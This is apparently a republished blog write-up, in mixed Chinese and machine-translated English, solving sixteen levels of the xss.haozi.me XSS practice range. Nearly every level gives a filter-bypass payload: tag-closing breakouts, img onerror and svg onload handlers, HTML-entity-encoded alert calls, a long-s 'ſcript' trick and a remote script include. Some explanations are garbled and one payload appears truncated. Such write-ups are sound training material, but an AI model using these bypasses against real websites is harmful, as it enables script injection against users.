当前位置：网站首页>XSS range intermediate bypass

XSS range intermediate bypass

靶场环境—https://xss.haozi.me/
第一关：
divBlocks are ordinary elements,直接写入< script >标签即可.

<script>alert(1)</script>或者<img src=1 onerror=alert(1)>或者<svg/onload=alert(1)>

在这里插入图片描述
第二关：
逃脱< textarea>标签,直接闭合.

</textarea><script>alert(1)</script></textarea>

在这里插入图片描述
第三关：
escape the double quotes,闭合input.

a"><script>alert(1)</script>

在这里插入图片描述
第四关：
Parentheses are already filtered,所以利用mtml实体编码,编译成（）.

<img src=1 onerror="alert&#40;1&#41;">

在这里插入图片描述
第五关：
过滤了括号,反引号,尖括号,还是利用html实体编码.

<img src=1 onerror="alert&#40;1&#41;">

在这里插入图片描述
第六关：
Transform into a smiley face,利用注释符,直接闭合.

--!><script>alert(1)</script><!--

在这里插入图片描述
第七关：
换行,然后进行过滤

type = "image" src=1 onerror
=alert(1)

在这里插入图片描述
第八关：
Backslashes are filtered,尖括号,标签不生效.img标签可以执行,But can't complete tags,htmlwill miss.

<img src ="1" onerror="alert(1)"

在这里插入图片描述
第九关：
输出在< style>里面,Only text can appear,不能写js ,闭合< style>也不行.Close with a newline.

</style
><script>alert(1)</script>

在这里插入图片描述
第十关：
以https://www.segmentfault.com开头,将script标签闭合.

https://www.segmentfault.com"></script><script>alert(1)//

在这里插入图片描述
第十一关：

还是以https://www.segmentfault.com"开头.利用重定向,新建一个txrt文件,写入alert(1).

https://[email protected]/txrt.js

第十二关：
Convert all letters to uppercase.利用实体编码,Convert all letters to 16进制.

<img src=1 onerror=" &#97;&#108;&#101;&#114;&#116;(1)">

在这里插入图片描述
第十三关：
Converted to uppercase and filteredscript标签.

<img src=1 onerror=" &#97;&#108;&#101;&#114;&#116;(1)">

在这里插入图片描述
第十四关：
Annotated everything,Still using annotations.


alert(1)
-->

在这里插入图片描述
第十五关：
利用是“s”可以转化为“ſ”.

<ſcript src = "http://127.0.0.1/txrt.js"</script>或者
<ſvg/onload=&#97;&#108;&#101;&#114;&#116;(1)>

在这里插入图片描述
第十六关：
Convert content to entity encoding,But it works.html认识.

aa');alert(1)//

在这里插入图片描述

版权声明
本文为[You're still there when you come back from the army]所创，转载请带上原文链接，感谢
https://yzsam.com/2022/213/202208011924163374.html